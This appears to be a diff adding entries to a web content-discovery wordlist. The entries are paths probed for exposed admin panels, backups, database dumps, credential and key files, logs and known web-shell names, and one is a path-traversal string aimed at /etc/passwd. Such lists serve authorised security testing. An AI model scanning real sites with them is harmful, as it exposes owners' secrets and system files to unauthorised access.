+2018.tar.bz2
+2018.tar.gz
+2018.tgz
+2018.zip
+2019.sql
+2019.tar
+2019.tar.bz2
+2019.tar.gz
+2019.tgz
+2019.zip
+2020.sql
+2020.tar
+2020.tar.bz2
+2020.tar.gz
+2020.tgz
+2020.zip
+2021.sql
+2021.tar
+2021.tar.bz2
+2021.tar.gz
+2021.tgz
+2021.zip
+2022-backup.zip
+2022.sql
+2022.tar
+2022.tar.bz2
+2022.tar.gz
+2022.tgz
+2022.zip
+2023-backup.zip
+2023.sql
+2023.tar
+2023.tar.bz2
+2023.tar.gz
+2023.tgz
+2023.zip
+2024-backup.zip
+2024.sql
+2024.tar
+2024.tar.bz2
+2024.tar.gz
+2024.tgz
+2024.zip
+2phpmyadmin/
+3.php
+4.php
+5.php
+6.php
+7.php
+7788.php
+8.php
+8899.php
+9.php
+9678.php
+\..\..\..\..\..\..\..\..\..\etc\passwd
+_.htpasswd
+__admin
+__bx_log.log
+__cache/
+__dummy.html
+__history/
+__index.php
+__init__.py
+__MACOSX
+__main__.py
+__php_errors.log
+__pma___
+__pycache__/
+__recovery/
+__SQL
+__test.php
+__web_console/
+_adm
+_admin
+_book
+_build
+_build/
+_cache/
+_common.xsl
+_config.inc
+_data/
+_data/error_log
+_debugbar/open
+_Dockerfile
+_errors
+_eumm/
+_files
+_fragment
+_h5ai/
+_include
+_index.php
+_install
+_internal
+_layouts
+_layouts/
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_log/
+_log/access-log
+_log/access.log
+_log/access_log
+_log/error-log
+_log/error.log
+_log/error_log
+_logs
+_logs/
+_logs/access-log
+_logs/access.log
+_logs/access_log
+_logs/err.log
+_logs/error-log
+_logs/error.log
+_logs/error_log
+_LPHPMYADMIN/
+_mmServerScripts/
+_mmServerScripts/MMHTTPDB.asp
+_mmServerScripts/MMHTTPDB.php
+_notes/
+_notes/dwsync.xml
+_novo/
+_novo/composer.lock
+_old
+_pages
+_php_errors.log
+_phpmyadmin/
+_pkginfo.txt
+_private
+_proxy
+_Pvt_Extensions
+_site/
+_source
+_SQL
+_sqladm
+_src
+_TeamCity
+_test
+_thumbs/
+_tracks
+_UpgradeReport_Files/
+_vti_bin/
+_vti_bin/_vti_adm/admin.dll
+_vti_bin/_vti_aut/author.dll
+_vti_bin/shtml.dll
+_vti_pvt/
+_vti_pvt/service.pwt
+_vti_pvt/users.pwt
+_WEB_INF/
+_wl_cls_gen.jar
+_wpeprivate
+_wpeprivate/
+_wpeprivate/config.json
+_www
+_yardoc/
+a%5c.aspx
+a.out
+aadmin/
+abs/
+acceptance_config.yml
+acceso
+acceso.php
+access
+access-log
+access-log.1
+access.1
+access.log
+access.php
+access.txt
+access/
+access_.log
+access_log
+access_log.1
+accesslog
+account.html
+account.php
+accounts
+accounts.php
+accounts.sql
+accounts.txt
+accounts.xml
+accounts/
+acct_login/
+activemq/
+activity.log
+actuator
+actuator/dump
+actuator/env
+actuator/logfile
+actuator/mappings
+actuator/trace
+ad_login
+ad_manage
+add.php
+add_admin
+adfs/services/trust/2005/windowstransport
+adm
+adm.html
+adm.php
+adm/
+adm/admloginuser.php
+adm/index.html
+adm/index.php
+adm_auth
+adm_auth.php
+admin
+admin%20/
+admin-authz.xml
+admin-console
+admin-console/
+admin-database
+admin-database.php
+admin-database/
+admin-dev/
+admin-dev/autoupgrade/
+admin-dev/backups/
+admin-dev/export/
+admin-dev/import/
+admin-login
+admin-login.html
+admin-login.php
+admin-serv/
+admin-serv/config/admpw
+admin.asp
+admin.aspx
+admin.cfm
+admin.cgi
+admin.conf
+admin.conf.default
+admin.dat
+admin.do
+admin.htm
+admin.htm.php
+admin.html
+admin.html.php
+admin.jsp
+admin.mdb
+admin.passwd
+admin.php
+admin.php3
+admin.pl
+admin/
+admin/.config
+admin/.htaccess
+admin/_logs/access-log
+admin/_logs/access.log
+admin/_logs/access_log
+admin/_logs/err.log
+admin/_logs/error-log
+admin/_logs/error.log
+admin/_logs/error_log
+admin/_logs/login.txt
+admin/access.log
+admin/access.txt
+admin/access_log
+admin/account
+admin/account.html
+admin/account.php
+admin/admin
+admin/admin-login
+admin/admin-login.html
+admin/admin-login.php
+admin/admin.html
+admin/admin.php
+admin/admin_login
+admin/admin_login.html
+admin/admin_login.php
+admin/adminLogin
+admin/adminLogin.htm
+admin/adminLogin.html
+admin/adminLogin.php
+admin/backup/
+admin/backups/
+admin/config.php
+admin/controlpanel
+admin/controlpanel.htm
+admin/controlpanel.html
+admin/controlpanel.php
+admin/cp
+admin/cp.html
+admin/cp.php
+admin/db/
+admin/default
+admin/default.asp
+admin/default/admin.asp
+admin/default/login.asp
+admin/download.php
+admin/dumper/
+admin/error.log
+admin/error.txt
+admin/error_log
+admin/export.php
+admin/FCKeditor
+admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
+admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/php/upload.php
+admin/fckeditor/editor/filemanager/upload/asp/upload.asp
+admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/upload/php/upload.php
+admin/file.php
+admin/files.php
+admin/home
+admin/home.html
+admin/home.php
+admin/includes/configure.php~
+admin/index
+admin/index.asp
+admin/index.html
+admin/index.php
+admin/js/tiny_mce/
+admin/js/tinymce/
+admin/log
+admin/login
+admin/login.asp
+admin/login.htm
+admin/login.html
+admin/login.php
+admin/logon.jsp
+admin/logs/
+admin/logs/access-log
+admin/logs/access.log
+admin/logs/access_log
+admin/logs/err.log
+admin/logs/error-log
+admin/logs/error.log
+admin/logs/error_log
+admin/logs/login.txt
+admin/manage
+admin/manage.asp
+admin/manage/admin.asp
+admin/manage/login.asp
+admin/mysql/
+admin/mysql/index.php
+admin/mysql2/index.php
+admin/phpMyAdmin
+admin/phpMyAdmin/
+admin/phpmyadmin/
+admin/phpMyAdmin/index.php
+admin/phpmyadmin/index.php
+admin/phpmyadmin2/index.php
+admin/pMA/
+admin/pma/
+admin/PMA/index.php
+admin/pma/index.php
+admin/pol_log.txt
+admin/private/logs
+admin/secure/logon.jsp
+admin/sqladmin/
+admin/sxd/
+admin/sysadmin/
+admin/upload.php
+admin/uploads.php
+admin/user_count.txt
+admin/web/
+admin0
+admin1
+admin1.htm
+admin1.html
+admin1.php
+admin1/
+admin2
+admin2.asp
+admin2.html
+admin2.old/
+admin2.php
+admin2/
+admin2/index.php
+admin2/login.php
+admin3/
+admin4/
+admin4_account/
+admin4_colon/
+admin5/
+admin_
+admin_/
+admin_admin
+admin_area
+admin_area.php
+admin_area/
+admin_area/admin
+admin_area/admin.html
+admin_area/admin.php
+admin_area/index.html
+admin_area/index.php
+admin_area/login
+admin_area/login.html
+admin_area/login.php
+admin_files
+admin_index
+admin_index.asp
+admin_login
+admin_login.html
+admin_login.php
+admin_login/
+admin_login/admin.asp
+admin_login/login.asp
+admin_logon
+admin_logon/
+admin_main
+admin_pass
+admin_tools/
+adminarea/
+adminarea/admin.html
+adminarea/admin.php
+adminarea/index.html
+adminarea/index.php
+adminarea/login.html
+adminarea/login.php
+adminconsole
+admincontrol
+admincontrol.html
+admincontrol.php
+admincontrol/
+admincontrol/login.html
+admincontrol/login.php
+admincp/
+admincp/index.asp
+admincp/index.html
+admincp/js/kindeditor/
+admincp/login
+admincp/login.asp
+admincp/upload/
+adminedit
+adminer-4.0.0-en.php
+adminer-4.0.0-mysql-en.php
+adminer-4.0.0-mysql.php
+adminer-4.0.0.php
+adminer-4.0.1-en.php
+adminer-4.0.1-mysql-en.php
+adminer-4.0.1-mysql.php
+adminer-4.0.1.php
+adminer-4.0.2-en.php
+adminer-4.0.2-mysql-en.php
+adminer-4.0.2-mysql.php
+adminer-4.0.2.php
+adminer-4.0.3-en.php
+adminer-4.0.3-mysql-en.php
+adminer-4.0.3-mysql.php
+adminer-4.0.3.php
+adminer-4.1.0-en.php
+adminer-4.1.0-mysql-en.php
+adminer-4.1.0-mysql.php
+adminer-4.1.0.php
+adminer-4.2.0-en.php
+adminer-4.2.0-mysql-en.php
+adminer-4.2.0-mysql.php
+adminer-4.2.0.php
+adminer-4.2.1-en.php
+adminer-4.2.1-mysql-en.php
+adminer-4.2.1-mysql.php
+adminer-4.2.1.php
+adminer-4.2.2-en.php
+adminer-4.2.2-mysql-en.php
+adminer-4.2.2-mysql.php
+adminer-4.2.2.php
+adminer-4.2.3-en.php
+adminer-4.2.3-mysql-en.php
+adminer-4.2.3-mysql.php
+adminer-4.2.3.php
+adminer-4.2.4-en.php
+adminer-4.2.4-mysql-en.php
+adminer-4.2.4-mysql.php
+adminer-4.2.4.php
+adminer-4.2.5-en.php
+adminer-4.2.5-mysql-en.php
+adminer-4.2.5-mysql.php
+adminer-4.2.5.php
+adminer-4.3.0-en.php
+adminer-4.3.0-mysql-en.php
+adminer-4.3.0-mysql.php
+adminer-4.3.0.php
+adminer-4.3.1-en.php
+adminer-4.3.1-mysql-en.php
+adminer-4.3.1-mysql.php
+adminer-4.3.1.php
+adminer-4.4.0-en.php
+adminer-4.4.0-mysql-en.php
+adminer-4.4.0-mysql.php
+adminer-4.4.0.php
+adminer-4.5.0-en.php
+adminer-4.5.0-mysql-en.php
+adminer-4.5.0-mysql.php
+adminer-4.5.0.php
+adminer-4.6.0-en.php
+adminer-4.6.0-mysql-en.php
+adminer-4.6.0-mysql.php
+adminer-4.6.0.php
+adminer-4.6.1-en.php
+adminer-4.6.1-mysql-en.php
+adminer-4.6.1-mysql.php
+adminer-4.6.1.php
+adminer-4.6.2-en.php
+adminer-4.6.2-mysql-en.php
+adminer-4.6.2-mysql.php
+adminer-4.6.2.php
+adminer-4.6.3-en.php
+adminer-4.6.3-mysql-en.php
+adminer-4.6.3-mysql.php
+adminer-4.6.3.php
+adminer-4.7.0-en.php
+adminer-4.7.0-mysql-en.php
+adminer-4.7.0-mysql.php
+adminer-4.7.0.php
+adminer-4.7.1-en.php
+adminer-4.7.1-mysql-en.php
+adminer-4.7.1-mysql.php
+adminer-4.7.1.php
+adminer-4.7.2-en.php
+adminer-4.7.2-mysql-en.php
+adminer-4.7.2-mysql.php
+adminer-4.7.2.php
+adminer-4.7.3-en.php
+adminer-4.7.3-mysql-en.php
+adminer-4.7.3-mysql.php
+adminer-4.7.3.php
+adminer-4.7.4-en.php
+adminer-4.7.4-mysql-en.php
+adminer-4.7.4-mysql.php
+adminer-4.7.4.php
+adminer-4.7.5-en.php
+adminer-4.7.5-mysql-en.php
+adminer-4.7.5-mysql.php
+adminer-4.7.5.php
+adminer-4.7.6-en.php
+adminer-4.7.6-mysql-en.php
+adminer-4.7.6-mysql.php
+adminer-4.7.6.php
+adminer-4.7.7-en.php
+adminer-4.7.7-mysql-en.php
+adminer-4.7.7-mysql.php
+adminer-4.7.7.php
+adminer-4.7.8-en.php
+adminer-4.7.8-mysql-en.php
+adminer-4.7.8-mysql.php
+adminer-4.7.8.php
+adminer-4.7.9-en.php
+adminer-4.7.9-mysql-en.php
+adminer-4.7.9-mysql.php
+adminer-4.7.9.php
+adminer-4.8.0-en.php
+adminer-4.8.0-mysql-en.php
+adminer-4.8.0-mysql.php
+adminer-4.8.0.php
+adminer-4.8.1-en.php
+adminer-4.8.1-mysql-en.php
+adminer-4.8.1-mysql.php
+adminer-4.8.1.php
+adminer.php
+adminer/
+adminer/adminer.php
+adminer_coverage.ser
+adminis.php
+administer/
+administr8
+administr8.php
+administr8/
+administracao.php
+administracion.php
+administracion/
+administrador/
+administrateur.php
+administrateur/
+administratie/
+administration
+administration.php
+administration/
+administration/Sym.php
+administrative/
+administrative/login_history
+administrator
+administrator-login/
+administrator.html
+administrator.php
+administrator/
+administrator/.htaccess
+administrator/account
+administrator/account.html
+administrator/account.php
+administrator/admin.asp
+administrator/admin/
+administrator/cache/
+administrator/db/
+administrator/includes/
+administrator/index.html
+administrator/index.php
+administrator/login
+administrator/login.asp
+administrator/login.html
+administrator/login.php
+administrator/logs
+administrator/logs/
+administrator/phpMyAdmin/
+administrator/phpmyadmin/
+administrator/PMA/
+administrator/pma/
+administrator/web/
+administratoraccounts/
+administratorlogin
+administratorlogin.php
+administratorlogin/
+administrators
+administrators.php
+administrators.pwd
+administrators/
+administrivia/
+adminitem
+adminitem/
+adminitems
+adminitems.php
+adminitems/
+adminlogin
+adminLogin.html
+adminLogin.php
+adminlogin.php
+adminLogin/
+adminlogon/
+adminpanel
+adminpanel.html
+adminpanel.php
+adminpanel/
+adminpro/
+admins
+admins.asp
+admins.php
+admins/
+admins/backup/
+admins/log.txt
+adminsite/
+AdminTools/
+adminuser
+admission_controller_config.yaml
+admloginuser.php
+admpar/
+admpar/.ftppass
+admrev/
+admrev/.ftppass
+admrev/_files/
+affiliate
+affiliate.php
+affiliates.sql
+ak47.php
+akeeba.backend.log
+all/
+all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+amad.php
+amministratore.php
+analog.html
+anchor/errors.log
+ansible/
+answers/
+answers/error_log
+apache/
+apache/logs/access.log
+apache/logs/access_log
+apache/logs/error.log
+apache/logs/error_log
+apc-nrp.php
+apc.php
+apc/
+apc/apc.php
+apc/index.php
+api
+api-doc
+api-docs
+api.log
+api.php
+api.py
+api.tar.gz
+api.tgz
+api.zip
+api/
+api/2/explore/
+api/error_log
+api/graphiql
+api/graphql
+api/jsonws
+api/login.json
+api/package_search/v4/documentation
+api/swagger
+api/swagger-ui.html
+api/swagger.yml
+api/v1
+api/v1/graphiql
+api/v1/graphql
+api/v1/playground
+api/v2
+api/v2/graphiql
+api/v2/graphql
+api/v2/playground
+api/v3
+api/v3/graphiql
+api/v3/graphql
+api/v3/playground
+api_log.txt
+apibuild.pyc
+apidoc
+apidocs
+apiserver-aggregator-ca.cert
+apiserver-aggregator.cert
+apiserver-aggregator.key
+apiserver-client.crt
+apiserver-key.pem
+app-service.yaml
+app.config
+app.config.env
+app.env
+app.js
+app.php
+app.yaml
+app.zip
+app/
+app/.htaccess
+app/__pycache__/
+app/bin
+app/bootstrap.php.cache
+app/cache/
+app/composer.json
+app/composer.lock
+app/config/adminConf.json
+app/Config/core.php
+app/Config/database.php
+app/config/database.yml
+app/config/database.yml.pgsql
+app/config/database.yml.sqlite3
+app/config/database.yml_original
+app/config/database.yml~
+app/config/databases.yml
+app/config/global.json
+app/config/parameters.ini
+app/config/parameters.yml
+app/config/routes.cfg
+app/config/schema.yml
+app/dev
+app/docs
+app/etc/config.xml
+app/etc/enterprise.xml
+app/etc/fpc.xml
+app/etc/local.additional
+app/etc/local.xml
+app/etc/local.xml.additional
+app/etc/local.xml.bak
+app/etc/local.xml.live
+app/etc/local.xml.localRemote
+app/etc/local.xml.phpunit
+app/etc/local.xml.template
+app/etc/local.xml.vmachine
+app/etc/local.xml.vmachine.rm
+app/languages
+app/log/
+app/logs/
+app/phpunit.xml
+app/src
+app/storage/
+app/sys
+app/testing
+app/tmp/
+app/unschedule.bat
+app/vendor
+app/vendor-
+app/vendor-src
+app_dev.php
+appcache.manifest
+appengine-generated/
+applet
+application
+application.log
+application.wadl
+application/
+application/cache/
+application/configs/application.ini
+application/logs/
+apply.cgi
+AppPackages/
+apps/
+apps/__pycache__/
+apps/frontend/config/app.yml
+apps/frontend/config/databases.yml
+appveyor.yml
+Aptfile
+ar-lib
+archaius
+archaius.json
+archive.7z
+archive.rar
+archive.sql
+archive.tar
+archive.tar.gz
+archive.tgz
+archive.zip
+article/
+article/admin
+article/admin/admin.asp
+artifactory/
+artifacts/
+ASALocalRun/
+asd.php
+asp.aspx
+aspnet_client/
+aspnet_webadmin
+aspwpadmin
+aspxspy.aspx
+asset..
+assets/
+assets/fckeditor
+assets/js/fckeditor
+assets/npm-debug.log
+assets/pubspec.yaml
+asterisk.log
+asterisk/
+AT-admin.cgi
+atlassian-ide-plugin.xml
+audit.log
+auditevents
+auditevents.json
+auth
+auth.inc
+auth.php
+auth.tar.gz
+auth.zip
+auth_user_file.txt
+authadmin
+authadmin.php
+authadmin/
+authenticate
+authenticate.php
+authentication
+authentication.php
+authlog.txt
+authorization.config
+authorize.php
+authorized_keys
+authorizenet.log
+authuser
+authuser.php
+auto/
+autoconfig
+autoconfig.json
+autodiscover/
+autologin
+autologin.php
+autologin/
+autom4te.cache
+autoscan.log
+AutoTest.Net/
+autoupdate/
+av/
+aws/
+awstats
+awstats.conf
+awstats.pl
+awstats/
+axis/
+axis//happyaxis.jsp
+axis2-web//HappyAxis.jsp
+axis2/
+axis2//axis2-web/HappyAxis.jsp
+axis2/axis2-web/HappyAxis.jsp
+azure-pipelines.yml
+azureadmin/
+b2badmin/
+babel.config.js
+back.sql
+back_office.php
+backoffice.php
+backoffice/
+backoffice/v1/ui
+backup
+backup-2022.zip
+backup-2023.zip
+backup-2024.zip
+backup.7z
+backup.cfg
+backup.htpasswd
+backup.inc
+backup.inc.old
+backup.old
+backup.rar
+backup.sql
+backup.sql.old
+backup.tar
+backup.tar.bz2
+backup.tar.gz
+backup.tgz
+backup.zip
+Backup/
+backup/
+backup0/
+backup1/
+backup123/
+backup2/
+backup2022.zip
+backup2023.zip
+backup2024.zip
+backups
+backups.7z
+backups.inc
+backups.inc.old
+backups.old
+backups.rar
+backups.sql
+backups.sql.old
+backups.tar
+backups.tar.bz2
+backups.tar.gz
+backups.tgz
+backups.zip
+backups/
+bak/
+bamb/
+bamboo/
+banner.swf
+banneradmin/
+base/
+basic_auth.csv
+bb-admin/
+bb-admin/admin
+bb-admin/admin.html
+bb-admin/admin.php
+bb-admin/index.html
+bb-admin/index.php
+bb-admin/login
+bb-admin/login.html
+bb-admin/login.php
+bbadmin/
+bbs/
+bbs/admin/login
+bbs/admin_index.asp
+bea_wls_cluster_internal/
+bea_wls_deployment_internal/
+bea_wls_deployment_internal/DeploymentService
+bea_wls_diagnostics/
+bea_wls_internal/
+beans
+beans.json
+behat.yml
+BenchmarkDotNet.Artifacts/
+Berksfile
+beta
+beta.zip
+bigadmin/
+bigdump.php
+billing
+billing/
+billing/killer.php
+bin-debug/
+bin-release/
+bin/
+bin/config.sh
+bin/hostname
+bin/libs
+bin/reset-db-prod.sh
+bin/reset-db.sh
+bin/RhoBundle
+bin/target
+bin/tmp
+Binaries/
+bitbucket-pipelines.yml
+bitrix/
+bitrix/.settings
+bitrix/.settings.bak
+bitrix/.settings.php
+bitrix/.settings.php.bak
+bitrix/admin/help.php
+bitrix/admin/index.php
+bitrix/admin/site_checker.php
+bitrix/authorization.config
+bitrix/backup/
+bitrix/cache
+bitrix/cache_image
+bitrix/components/bitrix/desktop/admin_settings.php
+bitrix/components/bitrix/map.yandex.search/settings/settings.php
+bitrix/components/bitrix/player/player_playlist_edit.php
+bitrix/components/bitrix/sender.mail.editor/ajax.php
+bitrix/dumper/
+bitrix/error.log
+bitrix/import/
+bitrix/import/files
+bitrix/import/import
+bitrix/import/m_import
+bitrix/license_key.php
+bitrix/logs/
+bitrix/managed_cache
+bitrix/modules
+bitrix/modules/error.log
+bitrix/modules/error.log.old
+bitrix/modules/main/admin/restore.php
+bitrix/modules/main/classes/mysql/agent.php
+bitrix/modules/main/include/virtual_file_system.php
+bitrix/modules/serverfilelog-0.dat
+bitrix/modules/serverfilelog-1.dat
+bitrix/modules/serverfilelog_tmp.dat
+bitrix/modules/smtpd.log
+bitrix/modules/updater.log
+bitrix/modules/updater_partner.log
+bitrix/otp/
+bitrix/php_interface/dbconn.php
+bitrix/php_interface/dbconn.php2
+bitrix/settings
+bitrix/settings.bak
+bitrix/settings.php
+bitrix/settings.php.bak
+bitrix/stack_cache
+bitrix/tools/autosave.php
+bitrix/tools/get_catalog_menu.php
+bitrix/tools/html_editor_action.php
+bitrix/tools/mail_entry.php
+bitrix/tools/upload.php
+bitrix/tools/vote/uf.php
+bitrix/web.config
+bitrix_server_test.log
+bitrix_server_test.php
+bitrixsetup.php
+biy/
+biy/upload/
+Black.php
+blacklist.dat
+bld/
+blib/
+blockchain.json
+blog/
+blog/error_log
+blog/wp-content/backup-db/
+blog/wp-content/backups/
+blog/wp-login
+blog/wp-login.php
+blogindex/
+bookContent.swf
+boot.php
+bootstrap/data
+bootstrap/tmp
+bot.txt
+bower.json
+bower_components
+bower_components/
+box.json
+Brocfile.coffee
+Brocfile.js
+browser/
+brunch-config.coffee
+brunch-config.js
+bsmdashboards/messagebroker/amfsecure
+buck.sql
+buffer.conf
+bugs
+Build
+build
+build-iPhoneOS/
+build-iPhoneSimulator/
+Build.bat
+build.local.xml
+build.log
+build.properties
+build.sh
+build.xml
+build/
+build/build.properties
+build/buildinfo.properties
+build/reference/web-api/explore
+build/Release
+build_config_private.ini
+build_isolated/
+buildNumber.properties
+BundleArtifacts/
+bx_1c_import.php
+c-h.v2.php
+c100.php
+c22.php
+c99.php
+c99shell.php
+ca.crt
+ca.kru
+cabal-dev
+cabal.project.local
+cabal.project.local~
+cabal.sandbox.config
+cache
+cache-downloads
+cache/
+cache/sql_error_latest.cgi
+cachemgr.cgi
+caches
+cadmins/
+Cakefile
+Capfile
+capistrano/
+captures/
+Cargo.lock
+Carthage/Build
+cassandra/
+catalog.wci
+CATKIN_IGNORE
+cbx-portal/
+cbx-portal/js/zeroclipboard/ZeroClipboard.swf
+cc-errors.txt
+cc-log.txt
+ccbill.log
+ccp14admin/
+celerybeat-schedule
+cell.xml
+centreon/
+cert/
+certenroll/
+certprov/
+certsrv/
+cfexec.cfm
+cfg/
+cfg/cpp/
+CFIDE/
+CFIDE/administrator/
+cgi-bin/
+cgi-bin/awstats.pl
+cgi-bin/logi.php
+cgi-bin/login
+cgi-bin/login.cgi
+cgi-bin/php.ini
+cgi-bin/printenv.pl
+cgi-bin/test-cgi
+cgi-bin/test.cgi
+cgi-bin/ViewLog.asp
+cgi-sys/
+cgi-sys/realsignup.cgi
+cgi.pl/
+cgi/
+cgi/common.cg
+cgi/common.cgi
+Cgishell.pl
+change.log
+changeall.php
+CHANGELOG
+ChangeLog
+Changelog
+changelog
+CHANGELOG.HTML
+CHANGELOG.html
+ChangeLog.html
+Changelog.html
+changelog.html
+CHANGELOG.MD
+CHANGELOG.md
+ChangeLog.md
+Changelog.md
+changelog.md
+CHANGELOG.TXT
+CHANGELOG.txt
+ChangeLog.txt
+Changelog.txt
+changelog.txt
+CHANGES.html
+CHANGES.md
+changes.txt
+check
+check.php
+checkadmin
+checkadmin.php
+checked_accounts.txt
+checklogin
+checklogin.php
+checkouts/
+checkstyle/
+checkuser
+checkuser.php
+chef/
+Cheffile
+chefignore
+chkadmin
+chklogin
+chubb.xml
+ci/
+cidr.txt
+circle.yml
+Citrix/
+citrix/
+Citrix/PNAgent/config.xml
+citydesk.xml
+ckeditor
+ckeditor/
+ckeditor/ckfinder/ckfinder.html
+ckeditor/ckfinder/core/connector/asp/connector.asp
+ckeditor/ckfinder/core/connector/aspx/connector.aspx
+ckeditor/ckfinder/core/connector/php/connector.php
+ckfinder/
+ckfinder/ckfinder.html
+claroline/phpMyAdmin/index.php
+classes/
+classes/cookie.txt
+classes_gen
+classic.json
+classic.jsonp
+cleanup.log
+cli/
+client.ovpn
+client_.ovpn
+client_secret.json
+client_secrets.json
+ClientAccessPolicy.xml
+ClientBin/
+cliente/
+cliente/downloads/h4xor.php
+clients.mdb
+clients.sql
+clients.sqlite
+clients.tar.gz
+clients.zip
+cloud-config.yml
+cloud/
+cmake_install.cmake
+CMakeCache.txt
+CMakeFiles
+CMakeLists.txt
+CMakeLists.txt.user
+CMakeScripts
+cmd-asp-5.1.asp
+cmdasp.asp
+cmdasp.aspx
+cmdjsp.jsp
+cms-admin
+cms.csproj
+cms/
+cms/cms.csproj
+cms/Web.config
+cmsadmin
+cmsadmin.php
+cmsadmin/
+cmscockpit/
+cni-conf.json
+code.zip
+codeception.yml
+codeship/
+collectd/
+collectl/
+com.tar.gz
+com.zip
+command.php
+common.inc
+common.xml
+common/
+common/config/api.ini
+common/config/db.ini
+compass.rb
+compile
+compile_commands.json
+components/
+composer-bx.json
+composer.json
+composer.lock
+composer.phar
+composer/installed.json
+conditions
+conf
+conf/
+conf/Catalina
+conf/catalina.policy
+conf/catalina.properties
+conf/context.xml
+conf/logging.properties
+conf/server.xml
+conf/tomcat-users.xml
+conf/tomcat8.conf
+conf/web.xml
+config
+config.bak
+config.codekit
+config.codekit3
+config.core
+config.dat
+config.env
+config.guess
+config.h.in
+config.hash
+config.inc
+config.inc.bak
+config.inc.old
+config.inc.php
+config.inc.php.txt
+config.inc.php~
+config.inc.txt
+config.inc~
+config.ini
+config.ini.bak
+config.ini.old
+config.ini.txt
+config.json
+config.json.cfm
+config.local
+config.local.php_old
+config.local.php~
+config.old
+config.php
+config.php-eb
+config.php.bak
+config.php.bkp
+config.php.dist
+config.php.inc
+config.php.inc~
+config.php.new
+config.php.old
+config.php.save
+config.php.swp
+config.php.txt
+config.php.zip
+config.php~
+config.rb
+config.ru
+config.source
+config.sub
+config.txt
+config.xml
+config.yml
+config.zip
+Config/
+config/
+config/apc.php
+config/app.php
+config/app.yml
+config/AppData.config
+config/autoload/
+config/aws.yml
+config/banned_words.txt
+config/config.inc
+config/config.ini
+config/database.yml
+config/database.yml.pgsql
+config/database.yml.sqlite3
+config/database.yml_original
+config/database.yml~
+config/databases.yml
+config/db.inc
+config/development/
+config/initializers/secret_token.rb
+config/master.key
+config/monkcheckout.ini
+config/monkdonate.ini
+config/monkid.ini
+config/producao.ini
+config/routes.yml
+config/settings.inc
+config/settings.ini
+config/settings.ini.cfm
+config/settings.local.yml
+config/settings/production.yml
+config/site.php
+config/xml/
+config_override.php
+configprops
+configs.zip
+configs/
+Configs/authServerSettings.config
+configs/conf_bdd.ini
+configs/conf_zepass.ini
+Configs/Current/authServerSettings.config
+configuration.ini
+configuration.php
+configuration.php.bak
+configuration.php.dist
+configuration.php.old
+configuration.php.save
+configuration.php.swp
+configuration.php.txt
+configuration.php.zip
+configuration.php~
+configuration.zip
+configuration/
+configure
+configure.scan
+conflg.php
+confluence/
+conn.asp
+connect.inc
+connection.inc
+console
+console/
+console/base/config.json
+console/payments/config.json
+consul/
+content/
+content/debug.log
+CONTRIBUTING.md
+contributing.md
+contributors.txt
+control
+control.php
+control/
+controller.php
+controllers/
+controlpanel
+controlpanel.html
+controlpanel.php
+controlpanel/
+cookbooks
+cookie
+cookie.php
+COPYING
+COPYRIGHT.txt
+core.zip
+core/latest/swagger-ui/index.html
+count_admin
+cover
+cover_db/
+coverage
+coverage.data
+coverage.xml
+coverage/
+cp
+cp.html
+cp.php
+cp/
+cpanel
+Cpanel.php
+cpanel.php
+cpanel/
+cpanel_file/
+cpbackup-exclude.conf
+cpbt.php
+cpn.php
+craft/
+crash.log
+credentials
+credentials.csv
+credentials.json
+credentials.txt
+credentials.xml
+credentials/
+credentials/gcloud.json
+CREDITS
+crm/
+cron.log
+cron.php
+cron.sh
+cron/
+cron/cron.sh
+cron_import.log
+cron_sku.log
+crond/
+crond/logs/
+cronlog.txt
+cscockpit/
+csdp.cache
+csp/gateway/slc/api/swagger-ui.html
+css.php
+csx/
+CTestTestfile.cmake
+culeadora.txt
+custom/
+custom/db.ini
+customer_login/
+customers.csv
+customers.log
+customers.mdb
+customers.sql
+customers.sql.gz
+customers.sqlite
+customers.txt
+customers.xls
+CVS/
+cvs/
+CVS/Entries
+CVS/Root
+d.php
+d0main.php
+d0maine.php
+d0mains.php
+dam.php
+dat.tar.gz
+dat.zip
+data-nseries.tsv
+data.mdb
+data.sql
+data.sqlite
+data.tsv
+data.txt
+data/
+data/backups/
+data/cache/
+data/debug/
+data/DoctrineORMModule/cache/
+data/DoctrineORMModule/Proxy/
+data/files/
+data/logs/
+data/sessions/
+data/tmp/
+database
+database.csv
+database.inc
+database.log
+database.mdb
+database.php
+database.sql
+database.sqlite
+database.txt
+database.yml
+database.yml.pgsql
+database.yml.sqlite3
+database.yml_original
+database.yml~
+database.zip
+database/
+database/database/
+database/phpMyAdmin/
+database/phpmyadmin/
+database/phpMyAdmin2/
+database/phpmyadmin2/
+database_admin
+Database_Administration/
+Database_Backup/
+database_credentials.inc
+databases.yml
+databases.zip
+datadog/
+dataobject.ini
+davmail.log
+DB
+db
+db-admin
+db-admin/
+db-full.mysql
+db.csv
+db.inc
+db.ini
+db.log
+db.mdb
+Db.properties
+Db.script
+db.sql
+db.sqlite
+db.sqlite3
+db.xml
+db.yaml
+db.zip
+db/
+db/db-admin/
+db/dbadmin/
+db/dbweb/
+db/index.php
+db/main.mdb
+db/myadmin/
+db/phpMyAdmin-2/
+db/phpMyAdmin-3/
+db/phpMyAdmin/
+db/phpmyadmin/
+db/phpMyAdmin2/
+db/phpmyadmin2/
+db/phpMyAdmin3/
+db/phpmyadmin3/
+db/sql
+db/webadmin/
+db/webdb/
+db/websql/
+db1.mdb
+db1.sqlite
+db2
+db__.init.php
+db_admin
+db_backup.sql
+db_backups/
+db_session.init.php
+db_status.php
+dbaccess.log
+dbadmin.php
+dbadmin/
+dbadmin/index.php
+dbase
+dbase.sql
+dbbackup/
+dbdump.sql
+dbfix/
+dbweb/
+dead.letter
+DEADJOE
+debug
+debug-output.txt
+debug.inc
+debug.log
+debug.php
+debug.py
+debug.txt
+debug.xml
+debug/
+debug/pprof
+debug_error.jsp
+delete.php
+demo
+demo.php
+demo/
+demo/ejb/index.html
+demo/ojspext/events/globals.jsa
